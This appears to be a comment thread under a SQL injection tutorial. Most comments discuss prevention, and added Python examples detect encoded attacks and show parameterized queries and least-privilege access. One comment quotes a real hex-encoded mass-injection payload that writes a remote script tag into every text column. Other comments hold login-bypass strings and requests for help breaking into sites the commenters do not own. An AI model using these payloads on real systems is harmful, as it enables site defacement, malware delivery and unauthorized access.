I am still searching. If you know some, please let me know.
Thanks
|
|
| Subject:
|
reply |
Date: |
23 May 2008 |
| From: |
ram |
this article is very helpful to solve my problem while removing the vulnerabilities
thanks |
|
| Subject:
|
Najeeb |
Date: |
28 May 2008 |
| From: |
najeebkecherygmail.com |
Hi Friend,
So great to see such a wonderful and simple method to explain such a wonderful topic. You have done a great job my friend. I have enjoyed it so much and got a nice idea about SQL Injection. And it diverts my thoughts and brings me a lot of new things to take care of when I start coding. You should be proud, my friend. |
|
| Subject:
|
SQL Injection Programming Help |
Date: |
13 Jun. 2008 |
| From: |
Amir Segal |
If this helps at all, I posted a page with SQL Injection programming protection here:
http://www.cheergallery.com/SQLInjectionHelp.html
Amir Segal, Programmer |
|
| Subject:
|
What theyre really doing |
Date: |
18 Jun. 2008 |
| From: |
princeoforange |
FWIW, the techniques mentioned here don't quite describe the methods employed by recent SQL Injection attacks I've seen. Look for something like this being appended to a legitimate command parameter:
'DECLARE @S VARCHAR(4000) SET @S=CAST(0x4445434C415245204054205641524348415228323535292C404320564 152434841522832353529204445434C415245205461626C655F437572736F7220435 552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F 4D207379736F626A6563747320612C737973636F6C756D6E7320622057484552452 0612E69643D622E696420414E4420612E78747970653D27752720414E442028622E7 8747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D 323331204F5220622E78747970653D31363729204F50454E205461626C655F437572 736F72204645544348204E4558542046524F4D205461626C655F437572736F722049 4E544F2040542C4043205748494C4528404046455443485F5354415455533D302920 424547494E20455845432827555044415445205B272B40542B275D20534554205B2 72B40432B275D3D525452494D28434F4E5645525428564152434841522834303030 292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2 F7777772E6368696E61626E722E636F6D2F622E6A733E3C2F7363726970743E2727 2729204645544348204E4558542046524F4D205461626C655F437572736F7220494E 544F2040542C404320454E4420434C4F5345205461626C655F437572736F7220444 5414C4C4F43415445205461626C655F437572736F7220 AS VARCHAR(4000));EXEC(@S);--
If you print @S, you get:
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.chinabnr.com/b.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor |
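An added example to go with princeoforange's observation (editorial code, not from the article or from the commenter): the whole point of the hex CAST(...) wrapper is that the batch is invisible to anyone grepping logs for DECLARE, CURSOR or sysobjects, so a log-side detector has to pull the hex blob out, decode it, and only then look for those tokens. The detector below does that for VARCHAR (8-bit) and NVARCHAR (UTF-16LE) blobs and tolerates hex that a log viewer has wrapped across lines. The sample request lines and the short hex batch they carry are constructed for this example; they are not the payload quoted above.

```python
import re
from urllib.parse import unquote

# Matches CAST(0x<hex> AS VARCHAR(n)) or NVARCHAR(n). Logs often wrap the long hex
# run across lines, so whitespace inside it is tolerated and stripped before decoding.
HEX_CAST_RE = re.compile(
    r"CAST\(\s*0x([0-9A-Fa-f\s]+?)\s+AS\s+(N?)VARCHAR", re.IGNORECASE
)

# Tokens that mark a DECODED batch as the cursor-driven mass update quoted in the
# comment above. Most of them only become visible after the hex has been decoded.
SUSPICIOUS_TOKENS = ("DECLARE", "EXEC(", "CURSOR", "sysobjects", "syscolumns", "<script")


def decode_hex_casts(text):
    """Return the decoded string for every hex CAST(...) found in text.

    VARCHAR blobs are 8-bit (decoded as latin-1); NVARCHAR blobs are UTF-16LE.
    Blobs that are not valid hex are skipped rather than raising: log data is untrusted.
    """
    decoded = []
    for hexblob, n_prefix in HEX_CAST_RE.findall(text):
        compact = re.sub(r"\s+", "", hexblob)
        if len(compact) % 2:
            continue  # an odd number of hex digits cannot be a byte string
        raw = bytes.fromhex(compact)
        codec = "utf-16-le" if n_prefix else "latin-1"
        decoded.append(raw.decode(codec, errors="replace"))
    return decoded


def suspicious_tokens(decoded_sql):
    """Return the suspicious tokens present in one decoded batch (case-insensitive)."""
    upper = decoded_sql.upper()
    return [t for t in SUSPICIOUS_TOKENS if t.upper() in upper]


def flag_request(log_line):
    """URL-decode one request line and return (decoded_batches, tokens_hit).

    Both lists are empty for a clean request; a non-empty tokens_hit is an alert.
    """
    batches = decode_hex_casts(unquote(log_line))
    hits = sorted({t for b in batches for t in suspicious_tokens(b)})
    return batches, hits


# Constructed sample (NOT the attacker's real payload): a short batch with the same
# shape as the decoded one above, hex-encoded here so the detector has something to
# decode, embedded in a URL-encoded query string the way a web server would log it.
SAMPLE_BATCH = "DECLARE @T VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT 1 EXEC('x')"
SAMPLE_LOG_LINES = [
    "GET /page.asp?id=42 HTTP/1.1",
    "GET /page.asp?id=42;DECLARE%20@S%20VARCHAR(4000)%20SET%20@S=CAST(0x"
    + SAMPLE_BATCH.encode("latin-1").hex().upper()
    + "%20AS%20VARCHAR(4000));EXEC(@S);-- HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLE_LOG_LINES:
        batches, hits = flag_request(line)
        print("ALERT" if hits else "ok   ", hits, batches)
```

Run over real IIS or Apache access logs, this is a triage aid rather than a blocker: it tells an administrator which requests carried an encoded batch and what that batch would have done, which is the information needed to decide whether the tables named in it now need cleaning.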
|
| Subject:
|
SQL Injection Req. further more definitions |
Date: |
25 Jun. 2008 |
| From: |
Sarvesh |
| Good explanation, need further details for the same. Alternatives? To avoid such an occurrence on the server. Removal of the extended stored procedures is not so easy, as they have multiple dependencies on them. |
|
| Subject:
|
the article |
Date: |
2 Jul. 2008 |
| From: |
me |
| good, except for the broken English |
|
| Subject:
|
Help! |
Date: |
2 Jul. 2008 |
| From: |
Adrian |
Hi. I tried using this tutorial against a page of my own. I'm not sure if it is vulnerable, because whenever I inject the code into the username and password and the hidden field it just throws me to the index of the site without telling me if my login information was correct or incorrect. I also tried to use the UNION command line, but it throws me to the index and shows me nothing more than it normally would. Would be grateful if someone helped me.
Thanks.
-Adrian |
|
| Subject:
|
Excellent |
Date: |
17 Jul. 2008 |
| From: |
Phil |
First class article. Excellent structure. Erudite content.
Many thanks.
--
Phil |
|
| Subject:
|
Table Name |
Date: |
21 Jul. 2008 |
| From: |
Murad |
| How can I find out table name by SQL injection? |
|
| Subject:
|
Firewall |
Date: |
24 Jul. 2008 |
| From: |
mrogersnetgmail.com |
Thanks. Good article and a lot of helpful comments on good coding practices to avoid SQL injection.
Any thoughts on firewall solutions such as Barracuda?
|
|
| Subject:
|
Another tip |
Date: |
22 Aug. 2008 |
| From: |
Brian |
| Make sure the login you use from your web site does NOT have permission to system tables when it is not needed, especially sysobjects,syscolumns, system_objects, etc... public has access to them by default and that is what opens the door wide for most of these lowlifes if they do find a crack. |
|
| Subject:
|
hey i dont get it... |
Date: |
5 Sep. 2008 |
| From: |
help |
i want to login to a certain website forum and i dont have a user name and password (its restricted to certain people). the html code is like .....
<form method="post" name="childLogin" onSubmit="if (this.childEmail.value=='' || this.childPass.value=='') {alert('Please enter login and password!'); return false;}">
it then says some other stuff so please can you tell me how to log in? |
|
| Subject:
|
Scans |
Date: |
9 Sep. 2008 |
| From: |
jimgeuinfdle.state.fl.us |
| Interestingly, if a web page has a Microsoft Search button on it, we discovered that the MS Search function develops an "index" in order to expedite the search. Often a scan will find the site vulnerable to SQL Injection, when it is actually the MS Index database that is vulnerable, but as far as I can tell, not exploitable. |
|
| Subject:
|
mohamed |
Date: |
10 Sep. 2008 |
| From: |
httpdepiak.catreloaded.net |
what is the best way to prevent it in php?
when receiving an id from the url, i set its type to integer.
i also use addslashes()
do you know any other good techniques? |
|
| Subject:
|
Doubt |
Date: |
16 Sep. 2008 |
| From: |
rajapradhagmail.com |
| having the username and the password as the same 1=1-- or hi' likewise for an aspx page, will it help? The article was quite nice since i got more info, but can you please clear up my doubt stated too.. Thanks in advance. |
|
| Subject:
|
sqp injections atk |
Date: |
17 Sep. 2008 |
| From: |
johnny |
| I greatly appreciated the effort of this tutorial, but can I ask: can SQL injection be done in games, and is the login and password to bypass the SQL query always ' or 1=1--? And if I insert this thing, which username's account will I be logged in as? Please explain. |
|
| Subject:
|
bNiceb |
Date: |
19 Sep. 2008 |
| From: |
Jonnycake |
Well, that's a nice tutorial. I didn't like that it focused on mssql though.
@Mohamed: That's a good idea. I don't think there's anything else you need to do. For strings use mysql_real_escape_string() or even parse it with a function that you wrote.
@Brian: Am I a lowlife? Wow, I hack. So what. Why am I a lowlife?
- Jonnycake <http://jonnycake.kicks-ass.net/index.php> |
|
| Subject:
|
sql injections |
Date: |
25 Sep. 2008 |
| From: |
shine |
| well, it is a good tutorial, i was trying the stuff given here with a login page. Whenever i inject '1 or1' in the username field/password field the error page is displayed. the application is asp.net, let me know any other way to do injection. |
|
| Subject:
|
SQL injections |
Date: |
15 Oct. 2008 |
| From: |
Kishore |
Very good article.
I discovered SQL injection in some of the pages of my application.
Thanks a lot.. |
|
| Subject:
|
Thank you! |
Date: |
23 Oct. 2008 |
| From: |
michel-vegan |
Hi,
I'm kind of a noob when it comes to this kind of thing
But after this I don't feel like a noob anymore :P
oh and it helped me with what i wanted
Very good article.
Thanks |
|
| Subject:
|
SQL injections |
Date: |
24 Oct. 2008 |
| From: |
Joby |
Very good article.
I discovered SQL injection in some of the pages of my application.
Thanks a lot.. well, it is a good tutorial, i was trying the stuff given here with a login page. Whenever i inject '1 or1' in the username field/password field the error page is displayed. the application is asp.net, let me know any other way to do injection. |
|
| Subject:
|
KEY TO PREVENT SQL INJECTION |
Date: |
11 Nov. 2008 |
| From: |
ANKUR |
TUTORIAL IS OF COURSE A QUALITY ONE!!! GREAT WORK BY AUTHOR...
TO PREVENT SQL INJECTION, ALWAYS REMEMBER ONE THING: ALL INPUTS ARE EVIL.
NEVER TRUST ANY USER INPUT(EVEN WHEN ITS HARD-CODED IN HIDDEN TEXT FIELD) OR INFORMATION FROM COOKIES.
ALWAYS PARSE THE INPUT AS HTML WHILE DISPLAYING THEM ON WEBPAGE. OTHERWISE, IT MIGHT BE EXPLOITED FOR HACKING SESSION ID OR RUNNING SCRIPTS.
BEFORE EXECUTING ANY SQL QUERY, ALWAYS PARSE IT TO VALID SQL USING CONSTRAINTS.
HAPPY SQL INJECTING... |
|
| Subject:
|
Sql injection |
Date: |
13 Nov. 2008 |
| From: |
Shivangi Jain |
Nice Tutorial!......
Yes, if i say stored procedures are enough for preventing SQL injection, that is not correct, because they can also be affected by SQL injection. So for preventing this you must use stored procedures and you must validate all your input fields and you must set the max length or the type, whether it may be integer or string, and you must encode all inputs as HTML, and replace some of the keywords if they come in the input fields, like select, insert, update or drop, quotes etc ........
Try this, but i am sure after implementing this there are fewer chances of SQL injection happening ....... |
|
| Subject:
|
SQL Injection - Good Article |
Date: |
17 Nov. 2008 |
| From: |
Abhishek Ghai |
| This is really a very good and easy to understand article. |
|
| Subject:
|
SQL injection |
Date: |
4 Dec. 2008 |
| From: |
marifaj |
| Very good article about SQL Injection and presents the most usable cases of SQL Injection. |
|
| Subject:
|
None |
Date: |
31 Dec. 2008 |
| From: |
Anonymous |
For all those people using ' OR 1=1-- and still getting invalid username or password, try using " instead of '. The ' in the injection part is the supposed end of the input string, so if the start of the input string is a different symbol to the start of your injection, SQL will just carry on with the string. Example:
"SELECT * FROM user WHERE user="$inputUser" AND pass="$inputPass"
If $inputUser is ' OR 1=1-- , it would think that's part of the username and not another part of the query.
However, if $inputUser is " OR 1=1-- , the query would look like this:
'SELECT * FROM user WHERE user = "" OR 1=1', that's how SQL would see the query. |
|
| Subject:
|
SQL INJECTION |
Date: |
7 Apr. 2009 |
| From: |
The WaTcHeR |
Here's my question, For the username and password I enter this:
Username:or '1'='1
Password:or '1'='1
Then I get this back:
Server Error in '/MPAOnline' Application.
Incorrect syntax near '1'.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Incorrect syntax near '1'.
Source Error:
An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.
Stack Trace:
[SqlException: Incorrect syntax near '1'.]
System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream) +742
System.Data.SqlClient.SqlCommand.ExecuteReader() +42
MPAOnline.clsFunctions.checkLogin(Object Username, Object Password, Object schoolyear) in c:\inetpub\wwwroot\MPAOnline\Modules\clsFunctions.vb:26
MPAOnline.Login.Button1_Click(Object sender, EventArgs e) in c:\inetpub\wwwroot\MPAOnline\Login.aspx.vb:64
System.Web.UI.WebControls.Button.OnClick(EventArgs e) +108
System.Web.UI.WebControls.Button.System.Web.UI.IPostBackEventHandler.RaisePostBackEvent(String eventArgument) +57
System.Web.UI.Page.RaisePostBackEvent(IPostBackEventHandler sourceControl, String eventArgument) +18
System.Web.UI.Page.RaisePostBackEvent(NameValueCollection postData) +33
System.Web.UI.Page.ProcessRequestMain() +1292
What should I do?
Also, I notice that when entering things like:
Username:a"="a
It replaces the double quotes with " so that the source code looks like this:
value="a"="a" If you put " in the username, it replaces " with &. |
|
| Subject:
|
Sql injection |
Date: |
1 May 2009 |
| From: |
Jonny |
$db = new PDO('pgsql:dbname=database');
$stmt = $db->prepare("SELECT priv FROM testUsers WHERE username=:username AND password=:password");
$stmt->bindParam(':username', $user);
$stmt->bindParam(':password', $pass);
$stmt->execute();
Basically, it assigns parameters to the query rather than concatenating the query together to be run. By doing this, you ensure that your parameters will be interpreted as parameters (text) and not sql. So by using this method you are 100% secure for sql injections. However rfi or xss attacks may still be a problem :P Hope this helped anybody who was looking for a solution.
|
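An added example that is not part of Jonny's post or of the original article, illustrating Jonny's PDO snippet and the earlier "Anonymous" remark about which quote character the developer used. It builds the same login query two ways against an in-memory SQLite table: once by string concatenation, where the injected ' OR 1=1-- (already quoted on this page) closes the developer's own quote, and once with bound parameters, where the SQL text contains no quoting of user data at all, so the question of ' versus " never arises. The accounts in the table are constructed sample data; the table name testUsers is borrowed from Jonny's snippet.

```python
import sqlite3


def make_db():
    """In-memory table with two constructed accounts; one name has an apostrophe."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE testUsers (username TEXT, password TEXT, priv TEXT)")
    conn.executemany(
        "INSERT INTO testUsers VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("o'brien", "pw", "user")],
    )
    return conn


def login_concat(conn, user, pw):
    """Vulnerable form: the query text is built by string concatenation, so a quote
    inside the input is indistinguishable from the developer's own quotes."""
    sql = f"SELECT priv FROM testUsers WHERE username='{user}' AND password='{pw}'"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return None  # malformed SQL: a legitimate apostrophe breaks this version too
    return row[0] if row else None


def login_param(conn, user, pw):
    """Hardened form, the equivalent of the PDO prepare/bindParam snippet above:
    the SQL text is fixed and the driver passes the values separately, so they are
    only ever compared as strings, whatever characters they contain."""
    row = conn.execute(
        "SELECT priv FROM testUsers WHERE username=? AND password=?", (user, pw)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    for user, pw in [("alice", "s3cret"), ("o'brien", "pw"), ("' OR 1=1--", "x")]:
        print(repr(user), "concat ->", login_concat(conn, user, pw),
              "| param ->", login_param(conn, user, pw))
```

The concatenated version returns the first account's privilege for the injected string and fails outright for the perfectly valid name o'brien; the parameterized version returns a privilege only when the stored username and password actually match. That second property is the one to test for in a code review: the SQL string passed to the driver should be a constant.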
|
| Subject:
|
Good Article |
Date: |
26 Oct. 2009 |
| From: |
mahato.sunilkumargmail.com |
| This article opened my eyes to how to write better SQL queries. |
|
| Subject:
|
Very nice tutorial |
Date: |
23 Nov. 2009 |
| From: |
HarnorizerHarnorizerharnorizeryahoo.ca |
| Very nice tutorial, but i have one problem: any time i try SQL injection, it doesn't work. i dont know if it's that i chose a non-vulnerable site or what? i really want to do SQL injection, but i have never succeeded... please someone help me... harnorizer@yahoo.ca |
|
| Subject:
|
What about Oracle |
Date: |
25 Nov. 2009 |
| From: |
BEDEbogdincescuyahoo.com |
Just fine!
Yet, being an Oracle developer, I think one do that in a well designed Oracle application.
That is because the web application would normally log on to the Oracle database as a dumb user that will see no database tables and will only have privileges for executing procedures in a number of packages (packages will allow getting only the intended data processing and hide the database structures). And using packages that would definitely not allow host procedure calls.
My conclusion: MS Servers suck, so that MS would better stick to workstations and Office applications. |
|
| Subject:
|
InsertUpdate |
Date: |
7 Dec. 2009 |
| From: |
Bob |
Great article, thank you it helps me a lot !
Just 1 question, is it possible to execute insert or update after a select statement with MYSQL/php ?
I saw your example with MSSQL Server but it seems that it's not working with MYSQL.
Something like
...page.php?id=5 union select 1,1,1; insert .... from .... --
fails but
...page.php?id=5 union select 1,1,1 --
works fine
Any ideas ?
thank you |
|
| Subject:
|
useful but |
Date: |
6 Jan. 2010 |
| From: |
Just like Bourne |
| Pretty useful but, there is no opportunity to try injection into any webpages allowed to do so as a practice so that I can see whether it really works. |
|
| Subject:
|
;D |
Date: |
11 Jan. 2010 |
| From: |
Packetdeath |
| The thing is, a lot of this is not well known, even though this subject is put out on so many different pages - often times administrators don't even know they've been hacked. ;) That is to say that, once you're in, if you don't do something that yells "I hacked your site." the people, or person, as it may be, won't even know, so the vulnerability goes unpatched/unfixed. |
|
| Subject:
|
Nice Article |
Date: |
12 Jan. 2010 |
| From: |
Up |
| Nice article on SQL Injection! |
|
| Subject:
|
how to inject |
Date: |
1 Feb. 2010 |
| From: |
ut4ever4u |
how to inject a new SQL file if the file is not injected already in the site to access the database. please tell me the stepwise complete process to use "metasploit" for injecting a file in any website's webpage.
I want to inject a file in my company's website to check its security level.
please reply to me on the same ID (as my name mentioned here) of Google mail.
thanx: |
|
| Subject:
|
Really Very Helping |
Date: |
1 Feb. 2010 |
| From: |
Sam |
| It is really helpful for beginners like me..Thanks for this
|
|
| Subject:
|
1 more |
Date: |
8 Feb. 2010 |
| From: |
Dkid |
Remember that after development you should create a user to do the normal things...
If the website only shows data (select) you should only have a user that does selects on the SQL server..
Why use the root user if it isn't necessary?
Think about it |
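An added example for the point Brian and Dkid both make (editorial code, not from either commenter or the article): the account the web application logs in with should be able to do only what the pages need. SQLite has no user accounts, so the example uses its authorizer hook as a stand-in for a database login that has been granted SELECT and nothing else; the schema is created before the restriction is applied, the way a DBA creates tables as an administrator and the application runs as a lesser account. The table and rows are constructed sample data. With this in place the cursor-driven UPDATE quoted earlier in the thread would be refused by the database itself even if the injection succeeded.

```python
import sqlite3

# Action codes the read-only web account is NOT allowed to perform.
WRITE_ACTIONS = {
    sqlite3.SQLITE_INSERT, sqlite3.SQLITE_UPDATE, sqlite3.SQLITE_DELETE,
    sqlite3.SQLITE_CREATE_TABLE, sqlite3.SQLITE_DROP_TABLE, sqlite3.SQLITE_ALTER_TABLE,
}


def read_only_authorizer(action, arg1, arg2, db_name, trigger_or_view):
    """Called by SQLite while compiling each statement; DENY makes compilation fail."""
    return sqlite3.SQLITE_DENY if action in WRITE_ACTIONS else sqlite3.SQLITE_OK


def make_db():
    """Create the schema and data as the 'owner', before any restriction applies."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO pages VALUES (1, 'Home')")
    conn.commit()
    return conn


def as_web_user(conn):
    """Restrict the connection to SELECT-only, like a login with only SELECT grants."""
    conn.set_authorizer(read_only_authorizer)
    return conn


def run(conn, sql, params=()):
    """Return the rows, or None if the database refused the statement."""
    try:
        return conn.execute(sql, params).fetchall()
    except sqlite3.Error:
        return None


if __name__ == "__main__":
    conn = as_web_user(make_db())
    print(run(conn, "SELECT title FROM pages WHERE id=?", (1,)))   # [('Home',)]
    print(run(conn, "UPDATE pages SET title='defaced'"))            # None: refused
    print(run(conn, "SELECT title FROM pages"))                     # still [('Home',)]
```

On a real server the equivalent is a dedicated login with SELECT granted on the application's own tables and no rights on the system catalog; Brian's warning about sysobjects and syscolumns is exactly the part that a default "public" grant leaves open.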
|